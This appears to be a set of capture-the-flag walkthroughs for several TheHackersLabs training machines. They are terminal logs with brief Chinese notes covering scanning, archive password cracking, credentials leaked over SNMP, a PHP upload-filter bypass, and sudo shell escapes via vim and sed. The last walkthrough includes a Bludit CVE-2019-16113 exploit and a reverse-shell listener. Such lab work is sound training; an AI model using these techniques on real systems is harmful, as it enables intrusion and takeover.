(base) yolo@yolo:~$ nmap -sV -Pn 10.161.167.222 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 22:11 CST Nmap scan report for 10.161.167.222 Host is up (0.81s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.65 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
(base) yolo@yolo:~$ ftp 10.161.167.222 Connected to 10.161.167.222. 220 Welcome zappskred. Name (10.161.167.222:yolo): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> help Commands may be abbreviated. Commands are:
! delete hash mlsd pdir remopts struct $ dirhelp mlst pls rename sunique account disconnect idle mode pmlsd reset system append edit image modtime preserve restart tenex ascii epsv lcd more progress rhelp throttle bell epsv4 less mput prompt rmdir trace binary epsv6 lpage mreget proxy rstatus type byeexit lpwd msend put runique umask case features ls newer pwd send unset cd fget macdef nlist quit sendport usage cdup form mdelete nmap quote set user chmod ftp mdir ntrans rate site verbose close gate mget open rcvbuf size xferbuf cr get mkdir page recv sndbuf ? debug glob mls passive reget status ftp> ls 229 Entering Extended Passive Mode (|||58817|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 28 Oct 29 20:59 login.txt -rw-r--r-- 1 0 0 65 Oct 29 21:23 secret.txt 226 Directory send OK. ftp> get login.txt local: login.txt remote: login.txt 229 Entering Extended Passive Mode (|||6845|) 150 Opening BINARY mode data connection for login.txt (28 bytes). 100% |*******************************************************************| 28 5.08 KiB/s 00:00 ETA 226 Transfer complete. 28 bytes received in 00:00 (3.04 KiB/s) ftp> get secret.txt local: secret.txt remote: secret.txt 229 Entering Extended Passive Mode (|||51043|) 150 Opening BINARY mode data connection for secret.txt (65 bytes). 100% |*******************************************************************| 65 9.05 KiB/s 00:00 ETA 226 Transfer complete. 65 bytes received in 00:00 (6.08 KiB/s) ftp> bye 221 Goodbye. (base) yolo@yolo:~$ ls 8c5852e6-56fe-4474-9fc7-70123454c347.gif key login.txt nfspy_mount pattern.txt secret.txt test1 Desktop key.pub miniforge3 ntfs.db reports snap test2 (base) yolo@yolo:~$ cat login.txt puerto 4444 coffee GoodLuck (base) yolo@yolo:~$ cat secret.txt 0jO cOn 31 c4fe 813n p23p424dO, 4 v3c35 14 pista 357a 3n 14 7424
~$ wget http://10.161.167.222/cuatrocuatroveces/Sup3rP4ss.rar ~$ rar2john Sup3rP4ss.rar > tmp ~$ john tmp --wordlist=/snap/seclists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 32 OpenMP threads Note: Passwords longer than 10 [worst case UTF-8] to 32 [ASCII] rejected Press 'q' or Ctrl-C to abort, 'h'forhelp, almost any other key for status reema (Sup3rP4ss.rar) 1g 0:00:00:19 DONE (2025-11-02 23:22) 0.05056g/s 4296p/s 4296c/s 4296C/s tracymcgrady..llandudno Use the "--show" option to display all of the cracked passwords reliably Session completed
拿到了压缩包密码
1 2 3 4 5 6 7 8 9 10 11 12 13
(base) yolo@yolo:~/Desktop/timu$ unrar x Sup3rP4ss.rar
UNRAR 7.00 freeware Copyright (c) 1993-2024 Alexander Roshal
Extracting from Sup3rP4ss.rar
Enter password (will not be echoed) for Sup3rP4ss.txt:
Extracting Sup3rP4ss.txt OK All OK (base) yolo@yolo:~/Desktop/timu$ cat Sup3rP4ss.txt Intenta probar con más >> 3spuM4
zappskred@TheHackersLabs-ZAPP:~$ ls user.txt zappskred@TheHackersLabs-ZAPP:~$ cat user.txt ZWwgbWVqb3?????????= zappskred@TheHackersLabs-ZAPP:~$ cat .bash_history ftp sudo apt install ftp sudo apt install vsftpd -y sudo su su clear sudo apt install vsftpd -y ftpdç ftpd cd /etc/ ls ip a cls clear ip a sudo dhclient clear ip a sudo reboot now cat /etc/sudoers sudocat /etc/sudoers sudo su sudo root exit clear ifconfig ip a ssh-keygen -f '/home/kali/.ssh' -R '192.168.1.34' ssh-keygen -f '/home/kali/ .ssh' -R '192.168.1.34' sudo ssh-keygen -f '/home/kali/ .ssh' -R '192.168.1.34' exit clear ls clear exit clear passwd exit clear ls cat clear sudo apt install zsh exit clear whoami sudo -l clear sudo zsh sudo su sudo root exit ls sudo -l sudo zsh clear echo"exitosocafe" | base64 exit ls ls -lash cp user.txt user.txt mv user.txt user.txt rm user.txt ls clear echo"el mejor cafe" | base64 > user.txt ls cd .. system apt install apache2 exit clear sudo zsh clear nano ~/.bashrc cat /etc/issue exit sudo zsh clear sudo zsh clear sudo zsh exit echo' ███████╗ █████╗ ██████╗ ██████╗ ╚══███╔╝██╔══██╗██╔══██╗██╔══██╗ ███╔╝ ███████║██████╔╝██████╔╝ ███╔╝ ██╔══██║██╔═══╝ ██╔═══╝ ███████╗██║ ██║██║ ██║ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ' | sudotee /etc/issue.net > /dev/null clear sudo zsh exit sudo zsh exit zappskred@TheHackersLabs-ZAPP:~$ sudo -l sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known [sudo] password for zappskred: Sorry, try again. [sudo] password for zappskred: Matching Defaults entries for zappskred on TheHackersLabs-ZAPP: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zappskred may run the following commands on TheHackersLabs-ZAPP: (root) /bin/zsh zappskred@TheHackersLabs-ZAPP:~$ sudo /bin/zsh sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known TheHackersLabs-ZAPP# cat ~/root.txt c2llbXByZSBlcyBudWV???????== TheHackersLabs-ZAPP#
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.208.161 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-05 21:03 CST Nmap scan report for 10.161.208.161 Host is up (0.0053s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0) 80/tcp open http Apache httpd 2.4.65 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.58 seconds
(base) yolo@yolo:~$ snmpwalk -v 2c -c public 10.161.208.161 NET-SNMP-EXTEND-MIB::nsExtendOutputFull NET-SNMP-EXTEND-MIB::nsExtendOutputFull = No more variables left in this MIB View (It is past the end of the MIB tree) (base) yolo@yolo:~$ snmpwalk -v 2c -c security 10.161.208.161 NET-SNMP-EXTEND-MIB::nsExtendOutputFull NET-SNMP-EXTEND-MIB::nsExtendOutputFull."mycreds" = STRING: ethan:1N3qVgwNB6cZmNSyr8iX$!
if (preg_match('/.+\.ph(p|ps|tml)/', $fileName)) { echo"Extensión no permitida."; die(); }
if (!preg_match('/^.+\.[a-z]{2,3}g$/', $fileName)) { echo"Solo se permiten imagenes."; die(); } //look here,发现后缀名仅仅看最后一个字母,恰好svg也是g结尾 foreach (array($contentType, $MIMEtype) as$type) { if (!preg_match('/image\/[a-z]{2,3}g/', $type)) { echo"Solo se permiten imagenes."; die(); } }
if ($_FILES["uploadFile"]["size"] > 500000) { echo"Archivo demasiado grande."; die(); }
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) { displayHTMLImage($target_file); } else { echo"Ocurrio un error al subir el archivo."; }
(base) yolo@yolo:~$ ssh ethan@10.161.208.161 The authenticity of host '10.161.208.161 (10.161.208.161)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.208.161' (ED25519) to the list of known hosts. ethan@10.161.208.161's password: Linux photographer 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠶⣞⡩⠽⢷⣆⣀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⢀⣀⡤⢿⠀⢹⠖⠒⡛⠧⠐⠉⣧⠀⠀⠀⠀ ⠀⢀⡠⠴⣲⣭⡁⠲⠇⢈⡑⢚⠪⠭⠤⠤⢄⣀⣿⠀⠀⠀⠀ ⢠⠃⠤⠄⠉⠉⠀⠐⠉⣡⠞⠁⢀⡴⠞⠉⢉⣩⠿⠶⣄⠀ ⢸⠀⠀⠀⠀⡄⠀⠀⣰⠃⠀⢠⡞⠀⠀⡴⢋⣴⣿⣿⣷⡘⣆ ⢸⠀⠀⠀⠀⡇⠀⠀⡏⠀⠀⣾⠀⠀⡜⢀⣾⣿⣤⣾⣿⡇⣿ ⢨⠀⠀⠀⠀⡇⠀⠀⣇⠀⠀⡏⠀⠀⡇⢸⣿⣿⣿⣿⣿⢁⡏ ⠈⠀⣀⠀⠀⣷⠀⠀⠘⢄⠀⢳⠀⠀⡇⠸⣿⣿⣹⡿⢃⡼⠁ ⢰⡀⠛⠓⠀⢻⠀⠀⠀⠀⢙⣻⡷⠦⣼⣦⣈⣉⣡⡴⠚⠀⠀ ⠀⢷⣄⡀⠀⠀⠀⢀⡠⠖⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠉⠛⠓⠒⠚⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀Photographer
Last login: Tue Oct 28 19:47:04 2025 from 192.168.1.17 ethan@photographer:~$ ls creds.txt user.txt
这里的提权是通过disk用户组
1 2
ethan@photographer:~$ id uid=1001(ethan) gid=1001(ethan) grupos=1001(ethan),6(disk)
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.144.56 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-09 12:20 CST Nmap scan report for 10.161.144.56 Host is up (0.86s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0) 80/tcp open http nginx 1.22.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.145.95 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-09 13:17 CST Nmap scan report for 10.161.145.95 Host is up (0.73s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
(base) yolo@yolo:~$ dirsearch -u http://lavashop.thl/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
Task Completed (base) yolo@yolo:~$ dirsearch -u http://lavashop.thl/pages/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ wfuzz -w /snap/seclists/1214/Discovery/Web-Content/common.txt -u http://lavashop.thl/pages/products.php?FUZZ=/etc/passwd --hh 1002 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://lavashop.thl/pages/products.php?FUZZ=/etc/passwd Total requests: 4750
===================================================================== ID Response Lines Word Chars Payload =====================================================================
(base) yolo@yolo:~/Desktop/tools$ gdb binary.elf GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git Copyright (C) 2024 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty"for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration"for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type"help". Type "apropos word" to search for commands related to "word"... pwndbg: loaded 209 pwndbg commands. Type pwndbg [filter] for a list. pwndbg: created 13 GDB functions (can be used with print/break). Type helpfunction to see them. Reading symbols from binary.elf... (No debugging symbols found in binary.elf) ------- tip of the day (disable with set show-tips off) ------- Want to NOP some instructions? Use patch <address> 'nop; nop; nop' pwndbg> target extended-remote 10.161.145.95:1337 Remote debugging using 10.161.145.95:1337 Reading /lib64/ld-linux-x86-64.so.2 from remote target... warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead. Reading /lib64/ld-linux-x86-64.so.2 from remote target... Reading symbols from target:/lib64/ld-linux-x86-64.so.2... Reading /usr/lib/debug/.build-id/8a/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target... Reading /lib64/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target... Reading /lib64/.debug/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target... Reading /usr/lib/debug//lib64/6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target... Reading /usr/lib/debug/lib64//6418ea8e57888dffe2d36c88b8c594201c25eb.debug from remote target...
This GDB supports auto-downloading debuginfo from the following URLs: <https://debuginfod.ubuntu.com> Debuginfod has been disabled. To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit. (No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2) Reading /usr/lib/debug/.build-id/a7/52f6d1c0edab0671d291d55c36296a3c55f0c2.debug from remote target... 0x00007ffff7fe5a50 in ?? () from target:/lib64/ld-linux-x86-64.so.2 LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA ─────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────── RAX 0 RBX 0 RCX 0 RDX 0 RDI 0 RSI 0 R8 0 R9 0 R10 0 R11 0 R12 0 R13 0 R14 0 R15 0 RBP 0 RSP 0x7fffffffed00 ◂— 1 RIP 0x7ffff7fe5a50 ◂— mov rdi, rsp ──────────────────────────────────────[ DISASM / x86-64 / setemulate on ]────────────────────────────────────── ► 0x7ffff7fe5a50 mov rdi, rsp RDI => 0x7fffffffed00 ◂— 1 0x7ffff7fe5a53 call 0x7ffff7fe6650 <0x7ffff7fe6650>
(base) yolo@yolo:~/Desktop/tools$ ssh -i rodri_key Rodri@10.161.145.95 The authenticity of host '10.161.145.95 (10.161.145.95)' can't be established. ED25519 key fingerprint is SHA256:09ZSLxiw1tvVbTWbg6eZzfN1d3i5dWrpGIe+aCobTK4. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:31: [hashed name] ~/.ssh/known_hosts:36: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.145.95' (ED25519) to the list of known hosts. Linux Thehackerslabs-LavaShop 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Rodri@Thehackerslabs-LavaShop:~$
base) yolo@yolo:~$ nmap -sV -Pn 10.161.149.147 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-09 21:34 CST Nmap scan report for 10.161.149.147 Host is up (0.76s latency). Not shown: 999 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.35 seconds (base) yolo@yolo:~$ dirsearch -u http://10.161.149.147/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~$ zip2john File.zip > ziphash ver 2.0 File.zip/Credentials/ is not encrypted, or stored with non-handled compression type (base) yolo@yolo:~$ john ziphash --wordlist=/snap/seclists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x]) Cost 1 (HMAC size [KiB]) is 1 for all loaded hashes Will run 32 OpenMP threads Press 'q' or Ctrl-C to abort, 'h'forhelp, almost any other key for status 121288 (File.zip/Credentials/Credentials.txt) 1g 0:00:00:00 DONE (2025-11-09 22:16) 3.704g/s 242725p/s 242725c/s 242725C/s 123456..ryanscott Use the "--show" option to display all of the cracked passwords reliably Session completed
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.159.35 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-10 18:21 CST Nmap scan report for 10.161.159.35 Host is up (0.30s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.13 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds
(base) yolo@yolo:~$ curl -l http://10.161.159.35/secret/ <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Secreto de Dragon Machine</title> <style> body { background-color: #222; color: #eee; font-family: 'Courier New', Courier, monospace; padding: 2em; text-align: center; } .riddle { background-color: #333; padding: 2em; border-radius: 12px; margin: 0 auto; max-width: 600px; box-shadow: 0 0 10px #f38ba8; } </style> </head> <body> <div class="riddle"> <h1>Para Dragon:</h1> <p>“En la sombra de la cueva, un guardián vigila sin ver,<br> Su nombre es la clave, su fuerza, un misterio por resolver.<br> Intenta sin pausa, las llaves del dragón,<br> Y hallarás el secreto que abre la prisión.”</p> </div> </body> </html>
(base) yolo@yolo:~$ ssh dragon@10.161.159.35 The authenticity of host '10.161.159.35 (10.161.159.35)' can't be established. ED25519 key fingerprint is SHA256:BffrSAW4tUB+TWrywXkSWeUxLcFSs0YSko5us+xdXQo. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.159.35' (ED25519) to the list of known hosts. dragon@10.161.159.35's password: Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-71-generic x86_64)
System information as of mar 05 ago 2025 08:13:17 UTC
System load: 0.84 Processes: 105 Usage of /: 40.7% of 11.21GB Users logged in: 0 Memory usage: 9% IPv4 address for enp0s3: 192.168.18.184 Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment.
El mantenimiento de seguridad expandido para Applications está desactivado
Se pueden aplicar 80 actualizaciones de forma inmediata. Para ver estas actualizaciones adicionales, ejecute: apt list --upgradable
Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales. Vea https://ubuntu.com/esm o ejecute «sudo pro status»
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Tue Aug 5 08:13:55 2025 from 192.168.18.16 dragon@TheHackersLabs-Dragon:~$ ls -la total 40 drwxr-x--- 5 dragon dragon 4096 ago 3 01:05 . drwxr-xr-x 3 root root 4096 jul 31 20:39 .. -rw------- 1 dragon dragon 2943 ago 5 08:22 .bash_history -rw-r--r-- 1 dragon dragon 220 mar 31 2024 .bash_logout -rw-r--r-- 1 dragon dragon 3771 mar 31 2024 .bashrc drwx------ 2 dragon dragon 4096 jul 31 20:44 .cache drwxrwxr-x 3 dragon dragon 4096 jul 31 20:58 .local -rw-r--r-- 1 dragon dragon 807 mar 31 2024 .profile drwx------ 2 dragon dragon 4096 jul 31 20:40 .ssh -rw-r--r-- 1 dragon dragon 0 ago 1 01:04 .sudo_as_admin_successful -rw-r--r-- 1 root root 33 ago 1 01:04 user.txt dragon@TheHackersLabs-Dragon:~$ cat user.txt e1f9c2e8a1d8477f9b3f6cd298?????? dragon@TheHackersLabs-Dragon:~$ sudo -l Matching Defaults entries for dragon on TheHackersLabs-Dragon: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User dragon may run the following commands on TheHackersLabs-Dragon: (ALL) NOPASSWD: /usr/bin/vim dragon@TheHackersLabs-Dragon:~$ sudo /usr/bin/vim -c ':!/bin/sh'
# id uid=0(root) gid=0(root) groups=0(root) # cd # ls -la total 44 drwx------ 4 root root 4096 ago 5 08:22 . drwxr-xr-x 23 root root 4096 jul 31 20:21 .. -rw------- 1 root root 2592 ago 5 08:22 .bash_history -rw-r--r-- 1 root root 3106 abr 22 2024 .bashrc -rw-r--r-- 1 root root 560 ago 4 13:33 congrats.txt -rw------- 1 root root 33 ago 1 01:17 .lesshst drwxr-xr-x 3 root root 4096 jul 31 21:04 .local -rw-r--r-- 1 root root 161 abr 22 2024 .profile -rw------- 1 root root 33 ago 1 01:10 root.txt drwx------ 2 root root 4096 jul 31 20:39 .ssh -rw------- 1 root root 743 ago 5 08:22 .viminfo # cat root.txt 7a4d1b35eebf4aefa5f1b0198b??????
解析提权payload
1
-c <command> Execute <command> after loading the first file
User thl may run the following commands on nodeception: (ALL) NOPASSWD: /usr/bin/vi (ALL : ALL) ALL
这绝对是个bug,最后只能爆破下密码了
1 2 3 4 5 6
thl@nodeception:~$ sudo su [sudo] password for thl: root@nodeception:/home/thl# id uid=0(root) gid=0(root) groups=0(root) root@nodeception:/home/thl# cd && cat root.txt THL_QzXeoMuYRcJtWHabn??????
❯ nmap -p- --min-rate 5000 10.161.161.139 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-10 23:10 CST Nmap scan report for 10.161.161.139 Host is up (0.00064s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds 65535/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 15.04 seconds ❯ nmap -sCV -p 65535 10.161.161.139 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-10 23:11 CST Nmap scan report for 10.161.161.139 Host is up (0.00059s latency).
PORT STATE SERVICE VERSION 65535/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0) | ssh-hostkey: | 256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA) |_ 256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 30.63 seconds
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers backup Disk IPC$ IPC IPC Service (Samba Server) nobody Disk Home Directories SMB1 disabled -- no workgroup available ❯ smbclient //10.161.161.139/backup -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jul 7 01:02:53 2025 .. D 0 Mon Jul 7 02:15:13 2025 secretito.zip N 216 Mon Jul 7 01:02:31 2025
19480400 blocks of size 1024. 16245492 blocks available smb: \> get secretito.zip getting file \secretito.zip of size 216 as secretito.zip (19.2 KiloBytes/sec) (average 19.2 KiloBytes/sec) smb: \> q
但是呢,我发现压缩包是加密过的,那就用john爆破处理了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
❯ bkcrack -L secretito.zip bkcrack 1.8.0 - 2025-08-18 Archive: secretito.zip Index Encryption Compression CRC32 Uncompressed Packed size Name ----- ---------- ----------- -------- ------------ ------------ ---------------- 0 ZipCrypto Store f2e5967a 22 34 password ❯ zip2john secretito.zip > ziphash ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0 Note: It is normal for some outputs to be very large ❯ john ziphash --wordlist=/snap/seclists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Cracked 1 password hash (is in /home/yolo/Desktop/tools/john/run/john.pot), use "--show" No password hashes left to crack (see FAQ) ❯ john ziphash --show secretito.zip/password:sebastian:password:secretito.zip::secretito.zip
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123 Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 31 Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
MariaDB [(none)]> use bunker; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
debian@Sedition:~$ sudo -l Matching Defaults entries for debian on sedition: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User debian may run the following commands on sedition: (ALL) NOPASSWD: /usr/bin/sed
发现可以用sed来进行sudo无密码提权
1 2 3 4 5 6
debian@Sedition:~$ sudo sed -n '1e exec sh 1>&0' /etc/hosts # id uid=0(root) gid=0(root) grupos=0(root) # cd # cat root.txt laflagdelbunkerderootmola??????
❯ nmap -p- --min-rate 5000 10.161.168.195 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-11 13:14 CST Nmap scan report for 10.161.168.195 Host is up (0.00066s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
追踪下web服务
发现需要更改host
1 2 3 4 5 6
❯ curl http://10.161.168.195:8080/ <!doctype html> <html lang=en> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to the target URL: <a href="http://watchstore.thl:8080/">http://watchstore.thl:8080/</a>. If not, click the link.
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.196.38 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-20 19:26 CST Nmap scan report for jaulacon2025.thl (10.161.196.38) Host is up (0.71s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.61 seconds
# dirty workaround to remove this warning: # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. # see https://github.com/nahi/httpclient/issues/252 class WebAgent class Cookie < HTTP::Cookie def domain self.original_domain end end end
def get_csrf(client, login_url) res = client.get(login_url) csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] end
def auth_ok?(res) HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location']) end
Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -u <username>, --user <username> Username of the admin -w <path>, --wordlist <path> Path to the wordlist file --debug Display arguments -H, --help Show this screen
(base) yolo@yolo:~$ head -n 40 48701.py # Title: Bludit 3.9.2 - Directory Traversal # Author: James Green # Date: 2020-07-20 # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: 3.9.2 # Tested on: Linux Ubuntu 19.10 Eoan # CVE: CVE-2019-16113 # # Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699
#### USAGE #### # 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP # 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir # 3. Run the exploit # 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc # 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
#!/usr/bin/env python3
import requests import re import argparse import random import string import base64 from requests.exceptions import Timeout
url = 'http://jaulacon2025.thl'# CHANGE ME username = 'Jaulacon2025'# CHANGE ME password = 'cassandra'# CHANGE ME
┌─[user@parrot]─[~] └──╼ $nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 10.161.196.38 45564 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
接下来继续维持一下shell
1 2 3 4 5
/usr/bin/script -qc /bin/bash /dev/null ^z stty raw -echo;fg reset xterm
